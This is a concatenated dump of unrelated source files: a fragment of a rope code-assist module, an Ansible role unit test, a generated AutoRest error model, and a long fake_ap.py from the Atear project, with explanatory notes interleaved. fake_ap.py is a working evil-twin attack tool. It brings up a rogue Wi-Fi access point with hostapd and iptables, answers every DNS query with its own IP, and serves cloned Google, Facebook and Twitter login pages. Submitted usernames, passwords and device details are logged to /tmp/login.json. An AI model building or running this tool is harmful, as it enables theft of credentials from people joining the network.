init = pyclass['__init__'].get_object()
if isinstance(init, pyobjects.AbstractFunction):
doc += '\n\n' + self._get_single_function_docstring(init)
return doc
def _get_function_docstring(self, pyfunction):
functions = [pyfunction]
if self._is_method(pyfunction):
functions.extend(self._get_super_methods(pyfunction.parent,
pyfunction.get_name()))
return '\n\n'.join([self._get_single_function_docstring(function)
for function in functions])
def _is_method(self, pyfunction):
return isinstance(pyfunction, pyobjects.PyFunction) and \
isinstance(pyfunction.parent, pyobjects.PyClass)
def _get_single_function_docstring(self, pyfunction):
signature = self._get_function_signature(pyfunction)
docs = self._trim_docstring(pyfunction.get_doc(), indents=2)
return signature + ':\n\n' + docs
def _get_super_methods(self, pyclass, name):
result = []
for super_class in pyclass.get_superclasses():
if name in super_class:
function = super_class[name].get_object()
if isinstance(function, pyobjects.AbstractFunction):
result.append(function)
result.extend(self._get_super_methods(super_class, name))
return result
def _get_function_signature(self, pyfunction, add_module=False):
location = self._location(pyfunction, add_module)
if isinstance(pyfunction, pyobjects.PyFunction):
info = functionutils.DefinitionInfo.read(pyfunction)
return location + info.to_string()
else:
return '%s(%s)' % (location + pyfunction.get_name(),
', '.join(pyfunction.get_param_names()))
def _location(self, pyobject, add_module=False):
location = []
parent = pyobject.parent
while parent and not isinstance(parent, pyobjects.AbstractModule):
location.append(parent.get_name())
location.append('.')
parent = parent.parent
if add_module:
if isinstance(pyobject, pyobjects.PyFunction):
module = pyobject.get_module()
location.insert(0, self._get_module(pyobject))
if isinstance(parent, builtins.BuiltinModule):
location.insert(0, parent.get_name() + '.')
return ''.join(location)
def _get_module(self, pyfunction):
module = pyfunction.get_module()
if module is not None:
resource = module.get_resource()
if resource is not None:
return pyfunction.pycore.modname(resource) + '.'
return ''
def _trim_docstring(self, docstring, indents=0):
"""The sample code from :PEP:`257`"""
if not docstring:
return ''
# Convert tabs to spaces (following normal Python rules)
# and split into a list of lines:
lines = docstring.expandtabs().splitlines()
# Determine minimum indentation (first line doesn't count):
indent = sys.maxint
for line in lines[1:]:
stripped = line.lstrip()
if stripped:
indent = min(indent, len(line) - len(stripped))
# Remove indentation (first line is special):
trimmed = [lines[0].strip()]
if indent < sys.maxint:
for line in lines[1:]:
trimmed.append(line[indent:].rstrip())
# Strip off trailing and leading blank lines:
while trimmed and not trimmed[-1]:
trimmed.pop()
while trimmed and not trimmed[0]:
trimmed.pop(0)
# Return a single string:
return '\n'.join((' ' * indents + line for line in trimmed))
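The PEP 257 algorithm above hinges on finding the smallest indentation shared by every line after the first. A condensed, standalone version (using `sys.maxsize`, the Python 3 spelling of `sys.maxint`; the helper name is illustrative):

```python
import sys

def trim_docstring(docstring):
    """Normalize a docstring per the PEP 257 sample code."""
    if not docstring:
        return ''
    lines = docstring.expandtabs().splitlines()
    # Minimum indentation of all non-blank lines after the first.
    indent = sys.maxsize
    for line in lines[1:]:
        stripped = line.lstrip()
        if stripped:
            indent = min(indent, len(line) - len(stripped))
    trimmed = [lines[0].strip()]
    if indent < sys.maxsize:
        trimmed.extend(line[indent:].rstrip() for line in lines[1:])
    # Drop leading and trailing blank lines.
    while trimmed and not trimmed[-1]:
        trimmed.pop()
    while trimmed and not trimmed[0]:
        trimmed.pop(0)
    return '\n'.join(trimmed)

print(trim_docstring('Summary.\n\n    Indented detail.\n    '))
```

The first line is special-cased because it sits on the same line as the opening quotes and carries no indentation of its own.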
# Deprecated classes
class TemplateProposal(CodeAssistProposal):
def __init__(self, name, template):
warnings.warn('TemplateProposal is deprecated.',
DeprecationWarning, stacklevel=2)
super(TemplateProposal, self).__init__(name, 'template')
self.template = template
class Template(object):
def __init__(self, template):
self.template = template
warnings.warn('Template is deprecated.',
DeprecationWarning, stacklevel=2)
def variables(self):
return []
def substitute(self, mapping):
return self.template
def get_cursor_location(self, mapping):
return len(self.template)
| lgpl-3.0 |
prune998/ansible | test/units/playbook/role/test_role.py | 82 | 9044 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import collections
from ansible.compat.tests import unittest
from ansible.compat.tests.mock import patch, MagicMock
from ansible.errors import AnsibleError, AnsibleParserError
from ansible.playbook.block import Block
from ansible.playbook.task import Task
from units.mock.loader import DictDataLoader
from units.mock.path import mock_unfrackpath_noop
from ansible.playbook.role import Role
from ansible.playbook.role.include import RoleInclude
from ansible.playbook.role import hash_params
class TestHashParams(unittest.TestCase):
def test(self):
params = {'foo': 'bar'}
res = hash_params(params)
self._assert_set(res)
self._assert_hashable(res)
def _assert_hashable(self, res):
a_dict = {}
try:
a_dict[res] = res
except TypeError as e:
self.fail('%s is not hashable: %s' % (res, e))
def _assert_set(self, res):
self.assertIsInstance(res, frozenset)
def test_dict_tuple(self):
params = {'foo': (1, 'bar',)}
res = hash_params(params)
self._assert_set(res)
def test_tuple(self):
params = (1, None, 'foo')
res = hash_params(params)
self._assert_hashable(res)
def test_tuple_dict(self):
params = ({'foo': 'bar'}, 37)
res = hash_params(params)
self._assert_hashable(res)
def test_list(self):
params = ['foo', 'bar', 1, 37, None]
res = hash_params(params)
self._assert_set(res)
self._assert_hashable(res)
def test_dict_with_list_value(self):
params = {'foo': [1, 4, 'bar']}
res = hash_params(params)
self._assert_set(res)
self._assert_hashable(res)
def test_empty_set(self):
params = set([])
res = hash_params(params)
self._assert_hashable(res)
self._assert_set(res)
def test_generator(self):
def my_generator():
for i in ['a', 1, None, {}]:
yield i
params = my_generator()
res = hash_params(params)
self._assert_hashable(res)
def test_container_but_not_iterable(self):
# This is a Container that is not iterable, which is unlikely but...
class MyContainer(collections.Container):
def __init__(self, some_thing):
self.data = []
self.data.append(some_thing)
def __contains__(self, item):
return item in self.data
def __hash__(self):
return hash(self.data)
def __len__(self):
return len(self.data)
def __call__(self):
return False
foo = MyContainer('foo bar')
params = foo
self.assertRaises(TypeError, hash_params, params)
class TestRole(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
@patch('ansible.playbook.role.definition.unfrackpath', mock_unfrackpath_noop)
def test_load_role_with_tasks(self):
fake_loader = DictDataLoader({
"/etc/ansible/roles/foo_tasks/tasks/main.yml": """
- shell: echo 'hello world'
""",
})
mock_play = MagicMock()
mock_play.ROLE_CACHE = {}
i = RoleInclude.load('foo_tasks', play=mock_play, loader=fake_loader)
r = Role.load(i, play=mock_play)
self.assertEqual(str(r), 'foo_tasks')
self.assertEqual(len(r._task_blocks), 1)
assert isinstance(r._task_blocks[0], Block)
@patch('ansible.playbook.role.definition.unfrackpath', mock_unfrackpath_noop)
def test_load_role_with_handlers(self):
fake_loader = DictDataLoader({
"/etc/ansible/roles/foo_handlers/handlers/main.yml": """
- name: test handler
shell: echo 'hello world'
""",
})
mock_play = MagicMock()
mock_play.ROLE_CACHE = {}
i = RoleInclude.load('foo_handlers', play=mock_play, loader=fake_loader)
r = Role.load(i, play=mock_play)
self.assertEqual(len(r._handler_blocks), 1)
assert isinstance(r._handler_blocks[0], Block)
@patch('ansible.playbook.role.definition.unfrackpath', mock_unfrackpath_noop)
def test_load_role_with_vars(self):
fake_loader = DictDataLoader({
"/etc/ansible/roles/foo_vars/defaults/main.yml": """
foo: bar
""",
"/etc/ansible/roles/foo_vars/vars/main.yml": """
foo: bam
""",
})
mock_play = MagicMock()
mock_play.ROLE_CACHE = {}
i = RoleInclude.load('foo_vars', play=mock_play, loader=fake_loader)
r = Role.load(i, play=mock_play)
self.assertEqual(r._default_vars, dict(foo='bar'))
self.assertEqual(r._role_vars, dict(foo='bam'))
@patch('ansible.playbook.role.definition.unfrackpath', mock_unfrackpath_noop)
def test_load_role_with_metadata(self):
fake_loader = DictDataLoader({
'/etc/ansible/roles/foo_metadata/meta/main.yml': """
allow_duplicates: true
dependencies:
- bar_metadata
galaxy_info:
a: 1
b: 2
c: 3
""",
'/etc/ansible/roles/bar_metadata/meta/main.yml': """
dependencies:
- baz_metadata
""",
'/etc/ansible/roles/baz_metadata/meta/main.yml': """
dependencies:
- bam_metadata
""",
'/etc/ansible/roles/bam_metadata/meta/main.yml': """
dependencies: []
""",
'/etc/ansible/roles/bad1_metadata/meta/main.yml': """
1
""",
'/etc/ansible/roles/bad2_metadata/meta/main.yml': """
foo: bar
""",
'/etc/ansible/roles/recursive1_metadata/meta/main.yml': """
dependencies: ['recursive2_metadata']
""",
'/etc/ansible/roles/recursive2_metadata/meta/main.yml': """
dependencies: ['recursive1_metadata']
""",
})
mock_play = MagicMock()
mock_play.ROLE_CACHE = {}
i = RoleInclude.load('foo_metadata', play=mock_play, loader=fake_loader)
r = Role.load(i, play=mock_play)
role_deps = r.get_direct_dependencies()
self.assertEqual(len(role_deps), 1)
self.assertEqual(type(role_deps[0]), Role)
self.assertEqual(len(role_deps[0].get_parents()), 1)
self.assertEqual(role_deps[0].get_parents()[0], r)
self.assertEqual(r._metadata.allow_duplicates, True)
self.assertEqual(r._metadata.galaxy_info, dict(a=1, b=2, c=3))
all_deps = r.get_all_dependencies()
self.assertEqual(len(all_deps), 3)
self.assertEqual(all_deps[0].get_name(), 'bam_metadata')
self.assertEqual(all_deps[1].get_name(), 'baz_metadata')
self.assertEqual(all_deps[2].get_name(), 'bar_metadata')
i = RoleInclude.load('bad1_metadata', play=mock_play, loader=fake_loader)
self.assertRaises(AnsibleParserError, Role.load, i, play=mock_play)
i = RoleInclude.load('bad2_metadata', play=mock_play, loader=fake_loader)
self.assertRaises(AnsibleParserError, Role.load, i, play=mock_play)
i = RoleInclude.load('recursive1_metadata', play=mock_play, loader=fake_loader)
self.assertRaises(AnsibleError, Role.load, i, play=mock_play)
@patch('ansible.playbook.role.definition.unfrackpath', mock_unfrackpath_noop)
def test_load_role_complex(self):
# FIXME: add tests for the more complex uses of
# params and tags/when statements
fake_loader = DictDataLoader({
"/etc/ansible/roles/foo_complex/tasks/main.yml": """
- shell: echo 'hello world'
""",
})
mock_play = MagicMock()
mock_play.ROLE_CACHE = {}
i = RoleInclude.load(dict(role='foo_complex'), play=mock_play, loader=fake_loader)
r = Role.load(i, play=mock_play)
self.assertEqual(r.get_name(), "foo_complex")
| gpl-3.0 |
csmengwan/autorest | AutoRest/Generators/Python/Python.Tests/Expected/AcceptanceTests/BodyDateTime/autorestdatetimetestservice/models/error.py | 104 | 1285 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
from msrest.exceptions import HttpOperationError
class Error(Model):
"""Error
:param status:
:type status: int
:param message:
:type message: str
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'int'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(self, status=None, message=None):
self.status = status
self.message = message
class ErrorException(HttpOperationError):
"""Server responsed with exception of type: 'Error'.
:param deserialize: A deserializer
:param response: Server response to be deserialized.
"""
def __init__(self, deserialize, response, *args):
super(ErrorException, self).__init__(deserialize, response, 'Error', *args)
| mit |
NORMA-Company/Atear-Beta | module/fake_ap.py | 3 | 22127 | import os
import threading
from flask import Flask, request, render_template, redirect, url_for
import json
import re
import network
from multiprocessing import Process
import datetime
import socket
import struct
import IN
from collections import defaultdict
import time
from execute import execute
class DNSQuery:
'''
@brief Minimal parser for a standard DNS query that can craft an
A-record response pointing every name at an arbitrary IP.
@see rfc 1035
'''
def __init__(self, data):
self.data = data
self.dominio = ''
# Extract the 4-bit Opcode from the flags byte into 'tipo' (Spanish for 'type').
tipo = (ord(data[2]) >> 3) & 15
if tipo == 0: # Opcode 0 mean a standard query(QUERY)
'''
data[12] is Question-field.
ex) 6'google'3'com'00
'''
ini = 12
lon = ord(data[ini])
while lon != 0:
self.dominio += data[ini + 1:ini + lon + 1] + '.'
ini += lon + 1
lon = ord(data[ini])
def respuesta(self, ip):
packet = ''
if self.dominio:
packet += self.data[:2] + "\x81\x80" # Response & No error.
packet += self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' # Questions and Answers Counts.
packet += self.data[12:] # Original Domain Name Question.
packet += '\xc0\x0c' # A domain name to which this resource record pertains.
packet += '\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' # type, class, ttl, data-length
packet += str.join('', map(lambda x: chr(int(x)), ip.split('.')))
return packet
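The length-prefixed label format that `__init__` walks (e.g. `\x06google\x03com\x00`) round-trips with a small standalone sketch. Helper names are hypothetical, and the code is written for Python 3, where indexing `bytes` yields ints (the original indexes Python 2 `str` and needs `ord`):

```python
def encode_name(domain):
    """Encode 'google.com' as length-prefixed labels ending in a zero byte."""
    out = b''
    for label in domain.split('.'):
        out += bytes([len(label)]) + label.encode('ascii')
    return out + b'\x00'

def decode_name(data, ini=0):
    """Inverse of encode_name; mirrors the loop in DNSQuery.__init__."""
    dominio = ''
    lon = data[ini]
    while lon != 0:
        dominio += data[ini + 1:ini + lon + 1].decode('ascii') + '.'
        ini += lon + 1
        lon = data[ini]
    return dominio

print(decode_name(encode_name('google.com')))  # 'google.com.'
```

The trailing dot in the decoded form comes from appending `.` after every label, exactly as `self.dominio` is built above.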
class DNSServer(object):
def __init__(self, iface, address):
self.iface = iface
self.START_SIGNAL = True
self.address = address
self.connect_user = dict()
def run(self):
dns_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
dns_sock.settimeout(3) # Set timeout on socket-operations.
execute('fuser -k -n udp 53')
time.sleep(0.5)
dns_sock.bind(('', 53))
while self.START_SIGNAL:
try:
data, addr = dns_sock.recvfrom(1024)
except:
continue
packet = DNSQuery(data)
# Return own IP adress.
dns_sock.sendto(packet.respuesta(self.address), addr)
dns_sock.close()
def stop(self):
self.START_SIGNAL = False
class OutOfLeasesError(Exception):
pass
class DHCPServer:
'''
This class implements a DHCP Server, limited to PXE options.
Implemented from RFC2131, RFC2132,
https://en.wikipedia.org/wiki/Dynamic_Host_Configuration_Protocol,
and http://www.pix.net/software/pxeboot/archive/pxespec.pdf.
'''
def __init__(self, iface):
# If SO_BINDTODEVICE is present, it is possible for dhcpd to operate on Linux with more than one network interface.
# man 7 socket
if not hasattr(IN, "SO_BINDTODEVICE"):
IN.SO_BINDTODEVICE = 25
self.iface = iface
self.START_SIGNAL = True
import network
if network.get_ip_address(self.iface):
self.ip = network.get_ip_address(self.iface)
else:
self.ip = '192.168.103.1'
self.port = 67
self.elements_in_address = self.ip.split('.')
# IP pool x.x.x.100 ~ x.x.x.150
self.offer_from = '.'.join(self.elements_in_address[0:3]) + '.100'
self.offer_to = '.'.join(self.elements_in_address[0:3]) + '.150'
self.subnet_mask = '255.255.255.0'
self.router = self.ip
self.dns_server = self.ip
self.broadcast = '<broadcast>'
self.file_server = self.ip
self.file_name = '' # no boot file configured; fall back to pxelinux.0 below
if not self.file_name:
self.force_file_name = False
self.file_name = 'pxelinux.0'
else:
self.force_file_name = True
self.ipxe = False
self.http = False
self.mode_proxy = False
self.static_config = dict()
self.whitelist = False
self.mode_debug = False
# The value of the magic-cookie is the 4 octet dotted decimal 99.130.83.99
# (or hexadecimal number 63.82.53.63) in network byte order.
# (this is the same magic cookie as is defined in RFC 1497 [17])
# In module struct '!' mean Big-endian
# 'I' mean unsigned int
self.magic = struct.pack('!I', 0x63825363) # magic cookie.
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.setsockopt(socket.SOL_SOCKET, IN.SO_BINDTODEVICE, self.iface + '\0')
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self.sock.bind(('', self.port))
# Specific key is MAC
self.leases = defaultdict(lambda: {'ip': '', 'expire': 0, 'ipxe': self.ipxe})
self.connect_user = dict()
self.connect_data = ''
def get_namespaced_static(self, path, fallback = {}):
statics = self.static_config
for child in path.split('.'):
statics = statics.get(child, {})
return statics if statics else fallback
def next_ip(self):
'''
This method returns the next unleased IP from range;
also does lease expiry by overwrite.
'''
# if we use ints, we don't have to deal with octet overflow
# or nested loops (up to 3 with 10/8); convert both to 32-bit integers
# e.g '192.168.1.1' to 3232235777
encode = lambda x: struct.unpack('!I', socket.inet_aton(x))[0]
# e.g 3232235777 to '192.168.1.1'
decode = lambda x: socket.inet_ntoa(struct.pack('!I', x))
from_host = encode(self.offer_from)
to_host = encode(self.offer_to)
# pull out already leased IPs
leased = [self.leases[i]['ip'] for i in self.leases
if self.leases[i]['expire'] > time.time()]
# convert to 32-bit int
leased = map(encode, leased)
# loop through, make sure not already leased and not in form X.Y.Z.0
for offset in xrange(to_host - from_host):
if (from_host + offset) % 256 and from_host + offset not in leased:
return decode(from_host + offset)
raise OutOfLeasesError('Ran out of IP addresses to lease!')
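The `encode`/`decode` lambdas in `next_ip` combine `inet_aton`/`inet_ntoa` with a big-endian unsigned 32-bit unpack so the lease range can be iterated as plain integers. The same trick as standalone functions (illustrative names):

```python
import socket
import struct

def ip_to_int(ip):
    # '!' = network (big-endian) byte order, 'I' = unsigned 32-bit int.
    return struct.unpack('!I', socket.inet_aton(ip))[0]

def int_to_ip(n):
    return socket.inet_ntoa(struct.pack('!I', n))

print(ip_to_int('192.168.1.1'))   # 3232235777
print(int_to_ip(3232235777 + 1))  # '192.168.1.2'
```

Working in integer space means incrementing an address never has to deal with per-octet carry: `10.0.0.255 + 1` is simply `10.0.1.0`.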
def tlv_encode(self, tag, value):
'''Encode a TLV option.'''
return struct.pack('BB', tag, len(value)) + value
def tlv_parse(self, raw):
'''Parse a string of TLV-encoded options.'''
ret = {}
while(raw):
[tag] = struct.unpack('B', raw[0])
if tag == 0: # padding
raw = raw[1:]
continue
if tag == 255: # end marker
break
[length] = struct.unpack('B', raw[1])
value = raw[2:2 + length]
raw = raw[2 + length:]
if tag in ret:
ret[tag].append(value)
else:
ret[tag] = [value]
return ret
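The tag-length-value scheme used by `tlv_encode`/`tlv_parse` for DHCP options (RFC 2132) can be demonstrated with a Python 3 round-trip. This is a sketch, not the class's methods: bytes index as ints here, where the original uses `struct.unpack('B', ...)` on Python 2 strings:

```python
import struct

def tlv_encode(tag, value):
    """One option: tag byte, length byte, then the raw value."""
    return struct.pack('BB', tag, len(value)) + value

def tlv_parse(raw):
    ret = {}
    while raw:
        tag = raw[0]
        if tag == 0:      # padding byte, skip
            raw = raw[1:]
            continue
        if tag == 255:    # end-of-options marker
            break
        length = raw[1]
        ret.setdefault(tag, []).append(raw[2:2 + length])
        raw = raw[2 + length:]
    return ret

# Option 53 (message type = DHCPOFFER) and 51 (lease time = 86400s).
packet = tlv_encode(53, b'\x02') + tlv_encode(51, struct.pack('!I', 86400)) + b'\xff'
parsed = tlv_parse(packet)
```

Values are collected into lists because a tag may legally appear more than once in a DHCP packet.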
def get_mac(self, mac):
'''
This method converts the MAC Address from binary to
human-readable format for logging.
'''
return ':'.join(map(lambda x: hex(x)[2:].zfill(2), struct.unpack('BBBBBB', mac))).upper()
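A Python 3 equivalent of the `hex()`-and-`zfill` formatting above: iterating over `bytes` already yields ints, so `format` with the `02X` spec replaces the unpack-and-slice dance (`format_mac` is a hypothetical name):

```python
def format_mac(raw):
    """Render 6 raw bytes as a colon-separated uppercase MAC string."""
    return ':'.join('{:02X}'.format(b) for b in raw)

print(format_mac(b'\x00\x1a\x2b\x3c\x4d\x5e'))  # '00:1A:2B:3C:4D:5E'
```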
def craft_header(self, message):
'''This method crafts the DHCP header using parts of the message.'''
xid, flags, yiaddr, giaddr, chaddr = struct.unpack('!4x4s2x2s4x4s4x4s16s', message[:44])
client_mac = chaddr[:6]
# op, htype, hlen, hops, xid
response = struct.pack('!BBBB4s', 2, 1, 6, 0, xid)
if not self.mode_proxy:
response += struct.pack('!HHI', 0, 0, 0) # secs, flags, ciaddr
else:
response += struct.pack('!HHI', 0, 0x8000, 0)
if not self.mode_proxy:
if self.leases[client_mac]['ip']: # OFFER
offer = self.leases[client_mac]['ip']
else: # ACK
offer = self.get_namespaced_static('dhcp.binding.{0}.ipaddr'.format(self.get_mac(client_mac)))
offer = offer if offer else self.next_ip()
self.leases[client_mac]['ip'] = offer
self.leases[client_mac]['expire'] = time.time() + 86400
response += socket.inet_aton(offer) # yiaddr
else:
response += socket.inet_aton('0.0.0.0')
response += socket.inet_aton(self.file_server) # siaddr
response += socket.inet_aton('0.0.0.0') # giaddr
response += chaddr # chaddr
# BOOTP legacy pad
response += chr(0) * 64 # server name
if self.mode_proxy:
response += self.file_name
response += chr(0) * (128 - len(self.file_name))
else:
response += chr(0) * 128
response += self.magic # magic section
return (client_mac, response)
def craft_options(self, opt53, client_mac):
'''
@brief This method crafts the DHCP option fields
@param opt53:
* 2 - DHCPOFFER
* 5 - DHCPACK
@see RFC2132 9.6 for details.
'''
response = self.tlv_encode(53, chr(opt53)) # message type, OFFER
response += self.tlv_encode(54, socket.inet_aton(self.ip)) # DHCP Server
if not self.mode_proxy:
subnet_mask = self.get_namespaced_static('dhcp.binding.{0}.subnet'.format(self.get_mac(client_mac)), self.subnet_mask)
response += self.tlv_encode(1, socket.inet_aton(subnet_mask)) # subnet mask
router = self.get_namespaced_static('dhcp.binding.{0}.router'.format(self.get_mac(client_mac)), self.router)
response += self.tlv_encode(3, socket.inet_aton(router)) # router
dns_server = self.get_namespaced_static('dhcp.binding.{0}.dns'.format(self.get_mac(client_mac)), [self.dns_server])
dns_server = ''.join([socket.inet_aton(i) for i in dns_server])
response += self.tlv_encode(6, dns_server)
response += self.tlv_encode(51, struct.pack('!I', 86400)) # lease time
# TFTP Server OR HTTP Server; if iPXE, need both
response += self.tlv_encode(66, self.file_server)
# file_name null terminated
if not self.ipxe or not self.leases[client_mac]['ipxe']:
# http://www.syslinux.org/wiki/index.php/PXELINUX#UEFI
if 93 in self.leases[client_mac]['options'] and not self.force_file_name:
[arch] = struct.unpack("!H", self.leases[client_mac]['options'][93][0])
if arch == 0: # BIOS/default
response += self.tlv_encode(67, 'pxelinux.0' + chr(0))
elif arch == 6: # EFI IA32
response += self.tlv_encode(67, 'syslinux.efi32' + chr(0))
elif arch == 7: # EFI BC, x86-64 (according to the above link)
response += self.tlv_encode(67, 'syslinux.efi64' + chr(0))
elif arch == 9: # EFI x86-64
response += self.tlv_encode(67, 'syslinux.efi64' + chr(0))
else:
response += self.tlv_encode(67, self.file_name + chr(0))
else:
response += self.tlv_encode(67, 'chainload.kpxe' + chr(0)) # chainload iPXE
if opt53 == 5: # ACK
self.leases[client_mac]['ipxe'] = False
if self.mode_proxy:
response += self.tlv_encode(60, 'PXEClient')
response += struct.pack('!BBBBBBB4sB', 43, 10, 6, 1, 0b1000, 10, 4, chr(0) + 'PXE', 0xff)
response += '\xff'
return response
def dhcp_offer(self, message):
'''This method responds to DHCP discovery with offer.'''
client_mac, header_response = self.craft_header(message)
options_response = self.craft_options(2, client_mac) # DHCPOFFER
response = header_response + options_response
self.sock.sendto(response, (self.broadcast, 68))
def dhcp_ack(self, message):
'''This method responds to DHCP request with acknowledge.'''
client_mac, header_response = self.craft_header(message)
options_response = self.craft_options(5, client_mac) # DHCPACK
response = header_response + options_response
self.sock.sendto(response, (self.broadcast, 68))
def validate_req(self):
return False
def run(self):
'''Main listen loop.'''
while self.START_SIGNAL:
message, address = self.sock.recvfrom(1024)
# 28 bytes of padding
# 6 bytes MAC to string.
[client_mac] = struct.unpack('!28x6s', message[:34]) # Get MAC address
self.leases[client_mac]['options'] = self.tlv_parse(message[240:])
type = ord(self.leases[client_mac]['options'][53][0]) # see RFC2131, page 10
# 1 = DHCP Discover message (DHCPDiscover).
# 2 = DHCP Offer message (DHCPOffer).
# 3 = DHCP Request message (DHCPRequest).
# 4 = DHCP Decline message (DHCPDecline).
# 5 = DHCP Acknowledgment message (DHCPAck).
# 6 = DHCP Negative Acknowledgment message (DHCPNak).
# 7 = DHCP Release message (DHCPRelease).
# 8 = DHCP Informational message (DHCPInform).
if type == 1:
try:
self.dhcp_offer(message)
self.connect_user.update({
'connected': self.leases[client_mac]['ip'],
'host_name': self.leases[client_mac]['options'][12][0],
'mac_addr': self.get_mac([client_mac][0]),
'Time': datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
})
# Keep the log as a real JSON array; concatenating str(dict)
# fragments produces output json.load cannot read back.
try:
records = json.loads(self.connect_data) if self.connect_data else []
except ValueError:
records = []
records.append(dict(self.connect_user))
self.connect_data = json.dumps(records, ensure_ascii=False)
with open('/tmp/connect.json', 'w+') as con_log_file:
con_log_file.write(self.connect_data)
except OutOfLeasesError:
pass
elif type == 3 and address[0] == '0.0.0.0' and not self.mode_proxy:
self.dhcp_ack(message)
elif type == 3 and address[0] != '0.0.0.0' and self.mode_proxy:
self.dhcp_ack(message)
def stop(self):
self.START_SIGNAL = False
class WEBServer(object):
def __init__(self, iface, address):
self.address = address
self.app = Flask(__name__,
template_folder=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'phishing/templates'),
static_folder=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'phishing/static'))
#self.sslify = SSLify(self.app)
self.iface = iface
self.logged_user = dict()
self.logged_data = ''
def run(self):
try:
os.remove('/tmp/login.json')
except OSError:
pass
try:
os.remove('/tmp/connect.json')
except OSError:
pass
self.app.add_url_rule('/', 'index', self.index)
self.app.add_url_rule('/login', 'login', self.login, methods=['POST'])
self.app.add_url_rule('/shutdown', 'stop', self.stop)
self.app.run(self.address, port=80, debug=False, threaded=True)
def index(self):
url = self.split_url(request.url)
if re.search('[a-zA-Z0-9_].google.[a-zA-Z0-9_]', url['domain']):
return render_template('google/index.html'), 200
elif re.search('[a-zA-Z0-9_].facebook.[a-zA-Z0-9_]', url['domain']):
return render_template('facebook/index.html'), 200
elif re.search('[a-zA-Z0-9_].twitter.[a-zA-Z0-9_]', url['domain']):
return render_template('twitter/index.html'), 200
else:
return render_template('google/index.html'), 200
def login(self):
self.logged_user.update({
'ip_addr': request.remote_addr,
'site': self.split_url(request.url)['domain'],
'mac_addr': network.get_remote_mac(self.iface, request.remote_addr),
'id': request.form['id'],
'pw': request.form['password'],
'Time': datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
})
self.logged_data = self.logged_data.replace('[', '')
self.logged_data = self.logged_data.replace(']', '')
self.logged_data = '[' + self.logged_data + str(self.logged_user) + ', ]'
with open('/tmp/login.json', 'w+') as log_file:
json.dump(self.logged_data, log_file, ensure_ascii=False)
return redirect(url_for('index'))
@staticmethod
def split_url(url):
url = url.split('/', 3)
return {'domain': url[2], 'path': url[3]}
def shutdown_server(self):
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
def stop(self):
self.shutdown_server()
return 'Server Shutdown'
class APCreate(object):
def __init__(self, iface, enc, ssid, password):
self.wlan = iface
self.ppp = 'eth0'
self.enc = str(enc).upper()
import network
# Get my IP address and create threads for DHCPServer, DNSServer and WEBServer.
if network.get_ip_address(self.wlan):
self.address = network.get_ip_address(self.wlan)
else:
# If no address could be detected, fall back to a static IP address.
self.address = '192.168.103.1'
self.netmask = '255.255.255.0'
self.ssid = ssid
self.password = password
self.dhcp = DHCPServer(self.wlan)
self.dhcp_thread = threading.Thread(target=self.dhcp.run)
self.dns_server = DNSServer(self.wlan, self.address)
self.dns_thread = threading.Thread(target=self.dns_server.run)
self.web_server = WEBServer(self.wlan, self.address)
self.web_process = Process(target=self.web_server.run)
self.isRunning = False
def config(self):
''' Make config file for hostapd. '''
conf_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'conf', 'run.conf')
conf = open(conf_file, 'w')
data = 'interface=' + self.wlan + '\n' + \
'driver=nl80211\n' + \
'ssid=' + self.ssid + '\n' + \
'channel=11\n'
if self.enc == 'WPA':
# When encryption mode is WPA, add WPA specific data.
enc = 'auth_algs=1\nignore_broadcast_ssid=0\nwpa=3\n' + \
'wpa_passphrase=' + self.password + '\n' + \
"wpa_key_mgmt=WPA-PSK\nwpa_pairwise=TKIP\nrsn_pairwise=CCMP"
data += enc
elif self.enc == 'WEP':
# When encryption mode is WEP, add WEP specific data.
enc = 'auth_algs=3\nwep_default_key=0\n' + \
'wep_key0=' + self.password
data += enc
conf.write(data)
conf.close()
def run(self):
self.config()
# Clean
self.stop()
execute('rfkill unblock wlan')
time.sleep(1)
if_up_cmd = 'ifconfig ' + self.wlan + ' up ' + self.address + ' netmask ' + self.netmask
execute(if_up_cmd)
time.sleep(1)
execute('killall hostapd')
# Set iptables rules so packets can be forwarded.
execute('sysctl -w net.ipv4.ip_forward=1')
execute('iptables -X')
execute('iptables -F')
execute('iptables -t nat -F')
execute('iptables -t nat -X')
execute('iptables -t nat -A POSTROUTING -o ' + self.ppp + ' -j MASQUERADE')
execute('iptables -A OUTPUT --out-interface ' + self.wlan + ' -j ACCEPT')
execute('iptables -A INPUT --in-interface ' + self.wlan + ' -j ACCEPT')
# Run hostapd. The hostapd daemon turns this machine into an access point.
execute('hostapd -B ' + os.path.join(os.path.dirname(os.path.abspath(__file__)), 'conf', 'run.conf'))
time.sleep(2)
self.dns_thread.start()
self.dhcp_thread.start()
time.sleep(2)
self.web_process.start()
self.isRunning = True
